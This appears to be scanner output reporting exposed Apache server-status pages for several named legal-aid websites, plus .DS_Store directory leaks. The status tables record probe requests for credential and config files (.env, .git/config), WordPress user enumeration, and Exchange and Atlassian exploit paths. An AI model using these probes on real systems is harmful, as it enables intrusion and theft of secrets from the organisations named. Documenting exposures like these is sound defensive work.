1.31129060.00.38876.29 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 36-92124011/5/14655K 0.20001.10.13644.51 70.132.1.80http/1.1legalaidconnections.org:8080GET /s/3134332e3230342e38392e3835/_/;/META-INF/maven/com.atlass 37-92122900/7/14868_ 1.391217090.00.49641.96 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 38-92122951/10/15353K 1.29001.00.29663.34 70.132.1.80http/1.1legalaidconnections.org:8080GET /telescope/requests HTTP/1.1 39-92123000/7/15723_ 2.361369180.00.46658.42 70.132.1.80http/1.1events.alas.org:8080GET /config.json HTTP/1.1 40-92123051/6/13798K 1.31011.60.37631.46 70.132.1.80http/1.1legalaidconnections.org:8080GET / HTTP/1.1 41-92124021/8/3739K 0.09001.70.02138.21 70.132.1.80http/1.1legalaidconnections.org:8080GET / HTTP/1.1 42-92124030/6/2038_ 0.14127000.00.0995.66 70.132.1.81http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 43-92124043/4/2114K 0.52003.90.0079.41 70.132.1.80http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 44-92124451/2/1442K 0.52001.00.0061.08 70.132.1.80http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 45-92124461/5/1571K 0.61001.10.0961.43 70.132.1.80http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 46-92124470/7/969_ 0.16113560.00.1339.01 70.132.1.139http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 47-92124480/7/950_ 0.14126750.00.0531.81 70.132.1.139http/1.1gwinnettfamilylawclinic.org:808GET /info.php HTTP/1.1 48-92-0/0/871. 0.231200.00.0042.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-92124661/2/1575W 0.52001.60.0042.86 70.132.1.80http/1.1legalaidconnections.org:8080GET / HTTP/1.1 50-92124760/7/994_ 0.2994870.00.09105.20 130.176.179.52http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 51-92124770/2/1151_ 0.281210150.00.0256.59 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /telescope/requests HTTP/1.1 52-92124780/5/
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ede76b7cc5
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-03-16T16:53:42 Current Time: Sunday, 19-Jun-2022 00:05:22 UTC Restart Time: Saturday, 19-Mar-2022 06:12:47 UTC Parent Server Config. Generation: 93 Parent Server MPM Generation: 92 Server uptime: 91 days 17 hours 52 minutes 35 seconds Server load: 9.98 2.55 0.85 Total accesses: 4335036 - Total Traffic: 195.9 GB CPU Usage: u62.06 s9.09 cu0 cs0 - .000898% CPU load .547 requests/sec - 25.9 kB/second - 47.4 kB/request 8 requests currently being processed, 126 idle workers .____________.___.________W_KKCK_._________K____._____..________ __________.__________________._______K_K___.____.__._______.____ ___.____._____._______ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-92-0/0/276507. 1.03500.00.0013138.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-92123250/5/270926_ 0.921143140.00.1312701.96 70.132.1.80http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-92123260/11/266323_ 0.361218590.00.1812755.87 70.132.1.80http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 3-92121690/6/252877_ 0.721394840.00.1011597.46 70.132.1.80http/1.1events.alas.org:8080GET / HTTP/1.1 4-92119270/44/245956_ 3.611488050.01.2411161.78 70.132.1.81http/1.1intranet.alas.org:8080GET / HTTP/1.1 5-92121780/8/236736_ 1.421270420.00.3110921.94 70.132.1.80http/1.1events.alas.org:8080GET /login.action HTTP/1.1 6-92123350/5/223985_ 0.8695920.00.2510563.00 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 7-92123360/9/216037_ 0.291400.00.1310106.22 70.132.1.80http/1.1on.alas.org:8080GET /login.action HTTP/1.1 8-92116180/88/207397_ 6.051392730.04.029424.93 70.132.1.80http/1.1events.alas.org:8080GET / HTTP/1.1 9-92123370/9/196843_ 0.34126380.00.109262.71 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 10-92119280/37/183429_ 3.421385800.00.898455.44 70.132.1.139http/1.1events.alas.org:8080GET /telescope/requests HTTP/1.1 11-92121790/10/164368_ 1.4382140.00.507892.38 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 12-92123380/6/158056_ 0.801487940.00.047066.30 70.132.1.80http/1.1events.alas.org:8080GET /config.json HTTP/1.1 13-92-0/0/153079. 0.62200.00.007022.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-92121890/9/142085_ 1.511385620.00.256207.86 70.132.1.139http/1.1events.alas.org:8080GET /s/3134332e3230342e38392e3233/_/;/META-INF/maven/com.atlass 15-92123560/8/121092_ 0.54727400.00.205772.66 70.132.1.81http/1.1atlantalegalaid.org:8080GET /login.action HTTP/1.1 16-92121980/7/107514_ 1.321400.00.245179.97 70.132.1.80http/1.1on.alas.org:8080GET /config.json HTTP/1.1 17-92-0/0/92553. 0.60800.00.004262.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-92123570/10/81023_ 0.1596460.00.103482.35 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 19-92122090/6/79018_ 0.811293880.00.053620.28 70.132.1.80http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 20-92123580/8/77298_ 0.181400.00.103566.77 70.132.1.80http/1.1secure.alas.org:8080GET /config.json HTTP/1.1 21-92123590/3/74263_ 0.801437240.00.053257.83 70.132.1.80http/1.1atlantalegalaid.org:8080GET /.env HTTP/1.1 22-92123600/5/70345_ 0.29126690.00.083161.99 70.132.1.139http/1.1gwinnettfamilylawclinic.org:808GET /.env HTTP/1.1 23-92122200/9/66674_ 1.841270700.00.162933.68 70.132.1.80http/1.1events.alas.org:8080GET /config.json HTTP/1.1 24-92123610/7/57317_ 0.4094470.00.212564.26 130.176.179.52http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 25-92123620/7/24586_ 0.3695590.00.251165.48 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /s/3134332e3230342e38392e3539/_/;/META-INF/maven/com.atlass 26-92123951/2/18937W 0.53001.50.00848.13 70.132.1.80http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 27-92122440/10/19675_ 0.901300.00.13900.15 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /.git/config HTTP/1.1 28-92123961/2/16958K 0.53011.60.00915.18 70.132.1.80http/1.1legalaidconnections.org:8080GET / HTTP/1.1 29-92123971/2/16252K 0.52011.50.00836.49 70.132.1.80http/1.1legalaidconnections.org:8080GET / HTTP/1.1 30-92123981/2/18132C 0.54000.20.03736.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-92123991/2/16364K 0.52011.60.00783.79 70.132.1.80http/1.1legalaidconnections.org:8080GET / HTTP/1.1 32-92124000/6/14852_ 0.14128430.00.09681.41 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 33-92-0/0/16382. 1.201400.00.00735.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-92122750/7/15961_ 1.421485170.00.08756.48 70.132.1.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 35-92122800/7/16369_ 1.31129060.00.38876.29 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 36-92124010/4/14654_ 0.20147940.00.12644.51 70.132.1.81http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 37-92122900/7/14868_ 1.391217090.00.49641.96 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 38-92122950/9/15352_ 1.291428910.00.29663.34 70.132.1.80http/1.1atlantalegalaid.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 39-92123000/7/15723_ 2.361369180.00.46658.42 70.132.1.80http/1.1events.alas.org:8080GET /config.json HTTP/1.1 40-92123050/5/13797_ 1.31135080.00.37631.45 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 41-92124020/7/3738_ 0.09135270.00.02138.21 70.132.1.139http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 42-92124030/6/2038_ 0.14127000.00.0995.66 70.132.1.81http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 43-92124042/3/2113K 0.52002.60.0079.41 70.132.1.80http/1.1legalaidconnections.org:8080GET /info.php HTTP/1.1 44-92124450/1/1441_ 0.521585290.00.0061.08 70.132.1.80http/1.1intranet.alas.org:8080GET / HTTP/1.1 45-92124460/4/1570_ 0.611397090.00.0961.43 70.132.1.80http/1.1events.alas.org:8080GET /login.action HTTP/1.1 46-92124470/7/969_ 0.16113560.00.1339.01 70.132.1.139http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 47-92124480/7/950_ 0.14126750.00.0531.81 70.132.1.139http/1.1gwinnettfamilylawclinic.org:808GET /info.php HTTP/1.1 48-92-0/0/871. 0.231200.00.0042.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-92124660/1/1574_ 0.521584190.00.0042.86 70.132.1.139http/1.1intranet.alas.org:8080GET / HTTP/1.1 50-92124760/7/994_ 0.2994870.00.09105.20 130.176.179.52http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 51-92124770/2/1151_ 0.281210150.00.0256.59 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /telescope/requests HTTP/1.1 52-92124780/5/1043_ 0.731248460.00.0149.06 70.132.60.147http/1.1events.alas.org:8080POST /wp-cron.php?doing_wp_cron=1655597102.99250698089599609375 53-92124790/2/1047_ 0.289</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed08f32115
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-03-16T16:53:42 Current Time: Sunday, 19-Jun-2022 00:05:22 UTC Restart Time: Saturday, 19-Mar-2022 06:12:47 UTC Parent Server Config. Generation: 93 Parent Server MPM Generation: 92 Server uptime: 91 days 17 hours 52 minutes 35 seconds Server load: 9.98 2.55 0.85 Total accesses: 4335057 - Total Traffic: 195.9 GB CPU Usage: u62.06 s9.09 cu0 cs0 - .000898% CPU load .547 requests/sec - 25.9 kB/second - 47.4 kB/request 20 requests currently being processed, 114 idle workers .___W_______K.___.________K_KKCK_.K_K_K____KK___.K____..______W_ __________._______K__________.K______K_K___.____.K_._______.____ _K_.____._____._______ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-92-0/0/276507. 1.03500.00.0013138.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-92123250/5/270926_ 0.921143140.00.1312701.96 70.132.1.80http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-92123260/11/266323_ 0.361218590.00.1812755.87 70.132.1.80http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 3-92121690/6/252877_ 0.721394840.00.1011597.46 70.132.1.80http/1.1events.alas.org:8080GET / HTTP/1.1 4-92119270/44/245956W 3.61000.01.2411161.78 70.132.1.80http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 5-92121780/8/236736_ 1.421370420.00.3110921.94 70.132.1.80http/1.1events.alas.org:8080GET /login.action HTTP/1.1 6-92123350/5/223985_ 0.8695920.00.2510563.00 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 7-92123360/9/216037_ 0.291400.00.1310106.22 70.132.1.80http/1.1on.alas.org:8080GET /login.action HTTP/1.1 8-92116180/88/207397_ 6.051392730.04.029424.93 70.132.1.80http/1.1events.alas.org:8080GET / HTTP/1.1 9-92123370/9/196843_ 0.34126380.00.109262.71 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 10-92119280/37/183429_ 3.421385800.00.898455.44 70.132.1.139http/1.1events.alas.org:8080GET /telescope/requests HTTP/1.1 11-92121790/10/164368_ 1.4382140.00.507892.38 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 12-92123381/7/158057K 0.80001.00.047066.30 70.132.1.80http/1.1legalaidconnections.org:8080GET /telescope/requests HTTP/1.1 13-92-0/0/153079. 0.62200.00.007022.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-92121890/9/142085_ 1.511385620.00.256207.86 70.132.1.139http/1.1events.alas.org:8080GET /s/3134332e3230342e38392e3233/_/;/META-INF/maven/com.atlass 15-92123560/8/121092_ 0.54727400.00.205772.66 70.132.1.81http/1.1atlantalegalaid.org:8080GET /login.action HTTP/1.1 16-92121980/7/107514_ 1.321400.00.245179.97 70.132.1.80http/1.1on.alas.org:8080GET /config.json HTTP/1.1 17-92-0/0/92553. 0.60800.00.004262.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-92123570/10/81023_ 0.1596460.00.103482.35 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 19-92122090/6/79018_ 0.811393880.00.053620.28 70.132.1.80http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 20-92123580/8/77298_ 0.181400.00.103566.77 70.132.1.80http/1.1secure.alas.org:8080GET /config.json HTTP/1.1 21-92123590/3/74263_ 0.801437240.00.053257.83 70.132.1.80http/1.1atlantalegalaid.org:8080GET /.env HTTP/1.1 22-92123600/5/70345_ 0.29126690.00.083161.99 70.132.1.139http/1.1gwinnettfamilylawclinic.org:808GET /.env HTTP/1.1 23-92122200/9/66674_ 1.841370700.00.162933.68 70.132.1.80http/1.1events.alas.org:8080GET /config.json HTTP/1.1 24-92123610/7/57317_ 0.4094470.00.212564.26 130.176.179.52http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 25-92123620/7/24586_ 0.3695590.00.251165.48 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /s/3134332e3230342e38392e3539/_/;/META-INF/maven/com.atlass 26-92123953/4/18939K 0.53009.40.01848.14 70.132.1.80http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 27-92122440/10/19675_ 0.901300.00.13900.15 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /.git/config HTTP/1.1 28-92123962/3/16959K 0.53002.70.00915.18 70.132.1.80http/1.1legalaidconnections.org:8080GET /s/3134332e3230342e38392e3539/_/;/META-INF/maven/com.atlass 29-92123973/4/16254K 0.52004.60.01836.50 70.132.1.80http/1.1legalaidconnections.org:8080GET / HTTP/1.1 30-92123981/2/18132C 0.54000.20.03736.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-92123993/4/16366K 0.52003.70.00783.79 70.132.1.80http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 32-92124000/6/14852_ 0.14128430.00.09681.41 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 33-92-0/0/16382. 1.201400.00.00735.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-92122751/8/15962K 1.42001.00.08756.48 70.132.1.80http/1.1legalaidconnections.org:8080GET /.env HTTP/1.1 35-92122800/7/16369_ 1.31129060.00.38876.29 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 36-92124011/5/14655K 0.20001.10.13644.51 70.132.1.80http/1.1legalaidconnections.org:8080GET /s/3134332e3230342e38392e3835/_/;/META-INF/maven/com.atlass 37-92122900/7/14868_ 1.391217090.00.49641.96 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 38-92122951/10/15353K 1.29001.00.29663.34 70.132.1.80http/1.1legalaidconnections.org:8080GET /telescope/requests HTTP/1.1 39-92123000/7/15723_ 2.361369180.00.46658.42 70.132.1.80http/1.1events.alas.org:8080GET /config.json HTTP/1.1 40-92123050/5/13797_ 1.31135080.00.37631.45 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 41-92124020/7/3738_ 0.09135270.00.02138.21 70.132.1.139http/1.1gwinnettfamilylawclinic.org:808GET /config.json HTTP/1.1 42-92124030/6/2038_ 0.14127000.00.0995.66 70.132.1.81http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 43-92124043/4/2114K 0.52003.90.0079.41 70.132.1.80http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 44-92124451/2/1442K 0.52001.00.0061.08 70.132.1.80http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 45-92124460/4/1570_ 0.611397090.00.0961.43 70.132.1.80http/1.1events.alas.org:8080GET /login.action HTTP/1.1 46-92124470/7/969_ 0.16113560.00.1339.01 70.132.1.139http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 47-92124480/7/950_ 0.14126750.00.0531.81 70.132.1.139http/1.1gwinnettfamilylawclinic.org:808GET /info.php HTTP/1.1 48-92-0/0/871. 0.231200.00.0042.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-92124661/2/1575K 0.52011.60.0042.86 70.132.1.80http/1.1legalaidconnections.org:8080GET / HTTP/1.1 50-92124760/7/994_ 0.2994870.00.09105.20 130.176.179.52http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 51-92124770/2/1151_ 0.281210150.00.0256.59 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /telescope/requests HTTP/1.1 52-92124780/5/1043_ 0.731248460.00.0149.06 70.132.60.147</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3124f627ed24f627ed8133ceef
Apache Status Apache Server Status for www.legalaidconnections.org (via 172.26.19.211) Server Version: Apache/2.4.29 (Ubuntu) Server MPM: prefork Server Built: 2022-03-16T16:53:42 Current Time: Sunday, 19-Jun-2022 00:05:22 UTC Restart Time: Saturday, 19-Mar-2022 06:12:47 UTC Parent Server Config. Generation: 93 Parent Server MPM Generation: 92 Server uptime: 91 days 17 hours 52 minutes 35 seconds Server load: 9.98 2.55 0.85 Total accesses: 4335073 - Total Traffic: 195.9 GB CPU Usage: u62.07 s9.09 cu0 cs0 - .000898% CPU load .547 requests/sec - 25.9 kB/second - 47.4 kB/request 35 requests currently being processed, 99 idle workers .___K__KK___K.__K.__KK____KWKKCK_.K_K_K_KK_KKK__.K____.._K_K__K_ _______K__._______K__________.K______K_K___._K__.K_.______K.___K _K_.____._____._______ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqConnChildSlotClientProtocolVHostRequest 0-92-0/0/276507. 1.03500.00.0013138.26 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 1-92123250/5/270926_ 0.921143140.00.1312701.96 70.132.1.80http/1.1atlantalegalaid.org:8080GET / HTTP/1.1 2-92123260/11/266323_ 0.361218590.00.1812755.87 70.132.1.80http/1.1survey.alas.org:8080GET /login.action HTTP/1.1 3-92121690/6/252877_ 0.721394840.00.1011597.46 70.132.1.80http/1.1events.alas.org:8080GET / HTTP/1.1 4-92119271/45/245957K 3.61011.31.2411161.78 70.132.1.80http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 5-92121780/8/236736_ 1.421370420.00.3110921.94 70.132.1.80http/1.1events.alas.org:8080GET /login.action HTTP/1.1 6-92123350/5/223985_ 0.8695920.00.2510563.00 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 7-92123361/10/216038K 0.29001.10.1410106.22 70.132.1.80http/1.1legalaidconnections.org:8080GET /s/3134332e3230342e38392e3233/_/;/META-INF/maven/com.atlass 8-92116181/89/207398K 6.05001.04.029424.93 70.132.1.80http/1.1legalaidconnections.org:8080GET /telescope/requests HTTP/1.1 9-92123370/9/196843_ 0.34126380.00.109262.71 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 10-92119280/37/183429_ 3.421385800.00.898455.44 70.132.1.139http/1.1events.alas.org:8080GET /telescope/requests HTTP/1.1 11-92121790/10/164368_ 1.4382140.00.507892.38 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 12-92123381/7/158057K 0.80001.00.047066.30 70.132.1.80http/1.1legalaidconnections.org:8080GET /telescope/requests HTTP/1.1 13-92-0/0/153079. 0.62200.00.007022.68 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 14-92121890/9/142085_ 1.511385620.00.256207.86 70.132.1.139http/1.1events.alas.org:8080GET /s/3134332e3230342e38392e3233/_/;/META-INF/maven/com.atlass 15-92123560/8/121092_ 0.54727400.00.205772.66 70.132.1.81http/1.1atlantalegalaid.org:8080GET /login.action HTTP/1.1 16-92121981/8/107515K 1.32001.00.245179.97 70.132.1.81http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 17-92-0/0/92553. 0.60800.00.004262.09 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 18-92123570/10/81023_ 0.1596460.00.103482.35 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 19-92122090/6/79018_ 0.811393880.00.053620.28 70.132.1.80http/1.1events.alas.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 20-92123581/9/77299K 0.18001.00.103566.77 70.132.1.80http/1.1legalaidconnections.org:8080GET /.env HTTP/1.1 21-92123591/4/74264K 0.80001.00.053257.83 70.132.1.80http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 22-92123600/5/70345_ 0.29126690.00.083161.99 70.132.1.139http/1.1gwinnettfamilylawclinic.org:808GET /.env HTTP/1.1 23-92122200/9/66674_ 1.841370700.00.162933.68 70.132.1.80http/1.1events.alas.org:8080GET /config.json HTTP/1.1 24-92123610/7/57317_ 0.4094470.00.212564.26 130.176.179.52http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 25-92123620/7/24586_ 0.3695590.00.251165.48 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /s/3134332e3230342e38392e3539/_/;/META-INF/maven/com.atlass 26-92123953/4/18939K 0.53009.40.01848.14 70.132.1.80http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 27-92122440/10/19675W 0.90000.00.13900.15 70.132.1.80http/1.1legalaidconnections.org:8080GET /server-status HTTP/1.1 28-92123962/3/16959K 0.53002.70.00915.18 70.132.1.80http/1.1legalaidconnections.org:8080GET /s/3134332e3230342e38392e3539/_/;/META-INF/maven/com.atlass 29-92123973/4/16254K 0.52004.60.01836.50 70.132.1.80http/1.1legalaidconnections.org:8080GET / HTTP/1.1 30-92123981/2/18132C 0.54000.20.03736.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 31-92123993/4/16366K 0.52003.70.00783.79 70.132.1.80http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 32-92124000/6/14852_ 0.14128430.00.09681.41 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 33-92-0/0/16382. 1.201400.00.00735.85 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 34-92122751/8/15962K 1.42001.00.08756.48 70.132.1.80http/1.1legalaidconnections.org:8080GET /.env HTTP/1.1 35-92122800/7/16369_ 1.31129060.00.38876.29 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /?rest_route=/wp/v2/users/ HTTP/1.1 36-92124011/5/14655K 0.20001.10.13644.51 70.132.1.80http/1.1legalaidconnections.org:8080GET /s/3134332e3230342e38392e3835/_/;/META-INF/maven/com.atlass 37-92122900/7/14868_ 1.391217090.00.49641.96 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET / HTTP/1.1 38-92122951/10/15353K 1.29001.00.29663.34 70.132.1.80http/1.1legalaidconnections.org:8080GET /telescope/requests HTTP/1.1 39-92123000/7/15723_ 2.361369180.00.46658.42 70.132.1.80http/1.1events.alas.org:8080GET /config.json HTTP/1.1 40-92123051/6/13798K 1.31011.60.37631.46 70.132.1.80http/1.1legalaidconnections.org:8080GET / HTTP/1.1 41-92124021/8/3739K 0.09001.70.02138.21 70.132.1.80http/1.1legalaidconnections.org:8080GET / HTTP/1.1 42-92124030/6/2038_ 0.14127000.00.0995.66 70.132.1.81http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 43-92124043/4/2114K 0.52003.90.0079.41 70.132.1.80http/1.1legalaidconnections.org:8080GET /?rest_route=/wp/v2/users/ HTTP/1.1 44-92124451/2/1442K 0.52001.00.0061.08 70.132.1.80http/1.1legalaidconnections.org:8080GET /.DS_Store HTTP/1.1 45-92124461/5/1571K 0.61001.10.0961.43 70.132.1.80http/1.1legalaidconnections.org:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 46-92124470/7/969_ 0.16113560.00.1339.01 70.132.1.139http/1.1gwinnettfamilylawclinic.org:808GET /login.action HTTP/1.1 47-92124480/7/950_ 0.14126750.00.0531.81 70.132.1.139http/1.1gwinnettfamilylawclinic.org:808GET /info.php HTTP/1.1 48-92-0/0/871. 0.231200.00.0042.71 ::1http/1.1atlantalegalaid.org:8080OPTIONS * HTTP/1.0 49-92124661/2/1575K 0.52011.60.0042.86 70.132.1.80http/1.1legalaidconnections.org:8080GET / HTTP/1.1 50-92124760/7/994_ 0.2994870.00.09105.20 130.176.179.52http/1.1gwinnettfamilylawclinic.org:808GET /server-status HTTP/1.1 51-92124770/2/1151_ 0.281210150.00.0256.59 70.132.1.80http/1.1gwinnettfamilylawclinic.org:808GET /telescope/requests HTTP/1.1 52
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09c0215adfc0215adfcb14a2b202d8411e581319bba1ded78cc
Found 4 files trough .DS_Store spidering: /shared /sites /sites/samsung-es /sites/samsung-es/fonts
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
Severity: low
Fingerprint: 5f32cf5d6962f09c39aac35b39aac35b19342573ec43856338f9c71592e08056
Found 14 files trough .DS_Store spidering: /admin /areascontent /assets /assets/bootstrap /assets/bootstrap/css /assets/css /assets/css/yourtimeyourway.css /assets/fonts /assets/ico /assets/imgs /assets/imgs/areas /assets/imgs/stock /assets/js /homecontent
Severity: low
Fingerprint: 5f32cf5d6962f09c11d3744d11d3744d8f22ac35f48ac6c557e1335375d95414
Found 12 files trough .DS_Store spidering: /admin /areascontent /assets /assets/bootstrap /assets/bootstrap/css /assets/css /assets/css/yourtimeyourway.css /assets/fonts /assets/ico /assets/imgs /assets/js /homecontent
Severity: low
Fingerprint: 5f32cf5d6962f09c0215adfc0215adfc3ef9dc40361cc07e590b877aaed9ac87
Found 4 files trough .DS_Store spidering: /admin /areascontent /assets /homecontent
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733ff2c540c78ac2396f33c269d1c7ed636f
Found 10 files trough .DS_Store spidering: /admin /areascontent /assets /assets/bootstrap /assets/css /assets/fonts /assets/ico /assets/imgs /assets/js /homecontent
Severity: low
Fingerprint: 5f32cf5d6962f09cec7f8772ec7f87721389a08e2d4c84fc7a6ca08c054fc48d
Found 11 files trough .DS_Store spidering: /admin /areascontent /assets /assets/bootstrap /assets/bootstrap/css /assets/css /assets/fonts /assets/ico /assets/imgs /assets/js /homecontent
